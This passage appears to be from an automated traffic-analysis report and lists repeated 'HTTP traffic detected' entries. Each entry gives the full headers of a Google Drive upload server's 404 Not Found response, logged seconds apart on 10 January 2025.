      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQVhbHzprAn3s_zF5XDSyutG2HCIF0awcD_dJaX7VHvJRzHB2IDfk25flWul1MBzWF8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:01:59 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-hV3rwzJN_1gZUwwRYtxpNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRDnqHm8BefEH3lod5D9UW2z172mmK7GUhPOBlLLoO8-kbEwzi1bnAyLNVkV_0hzG56Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:01 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-NA0wlWkxkYa9x389Mga2IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTkDFZ9pp_Fw8duLMVYfMBDavI60UkdmZSHUSUc7LYefcMbcfHz1W8v9kTjGA49EUa3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-l8jo_H8gaoWziyYY3X4MzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT042Xx1yiKIpgnG8UgUdnKee3U49v8f1Nxsa6eQvxdiitBrXc4tCxQOm3iQDFXJmsSVip8DyUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:06 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ge_DCY5KgpT5ysQFypfODw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6L1Otzde4zST6UBMOkjq93vnrVojAnxa30fYbeG4c4ggJ2aeTqi23Ev95Zeb1MMkpB8gRAWlEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-PbB5PoVftRiMW_YS3Qqfog' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTYEdbnO0Ao-2W0BCwAyqt0AgKd8ZMhAjfVy6vafgOMO19eymXO0mPW5P3eeLQ3ren3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:11 GMTContent-Security-Policy: script-src 'nonce-5ReVMcLKSnI00rHcgXEKcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSd8evy-nKqm5OnXVOEwkl-h2Wog7HKKgXrnepq2Hektu7_Qe5nasDRrSlGLn1fH-2-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:13 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-KL_ThV4n1YVTSP0R_vdcdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4eIlwszR7WgQLFMAkwKL62kM_uJ1airFXq4UPHkwQtxywnj-Hm1dnggPgE5P0GUoYPIkhjZ_4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:15 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-HYysF1XtdZs9QqezX6LoXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSpW8xOBkAT9QS_U2uFK7G2-VYKzvqNwhAZcILYHX2sLMQqgTchQtfFpiSW_7er8LZIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:18 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_1VUzfPAhMgPFEk-nWcpKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTWTk6Rnm6tHw3CUxkSbHBSNqRqmWJ-rLpAywEjnUSZpEXOaDvgXiG2sv1tywhr9DQoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:20 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-YzHRFf_zHNuMlgTDexlLrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQbtT-SmhVWmbRcqzXReMvBwkPJ50Yw4cSFweR62CINTu7OcglTdyk0EDIsuebAxWItContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:23 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-3Ufck2_7x0RIrS75j7neiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6M2NSFkfJFvcrBtQ_XHtvHGsKKJ6vXRXKJIpBUQsOTZ1hIO1-8TWika3XjNPQ42cm32P5sXNEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:25 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-B3Toi5nMbhkHph8dgDbyBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRdwd7Fv5Kv1lH39iPGzoXRW3WHictUyQMuZKxBrVkmSuYPAz0Sgpqz52glCh0apQ8GCCMObYQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-uyqkNyigyjZ1nIZMWNBJYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRi3d3Y2OIlsvhVxvNWs1evwkUwMmEpZwWGb0aYWBqGH7JhEH4urKGfs-1GS82Ly9K6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-1FZienMMVOpxJ0EBQZLnaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTDRb1_wZSGmth2kS1GmN3fzAri9Z5-j5n635pLFeDoQGg4lLBMero5b5pAN6n9wR-WContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:32 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-Nh0wu0yUsG5HkeFSJ4rMTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; 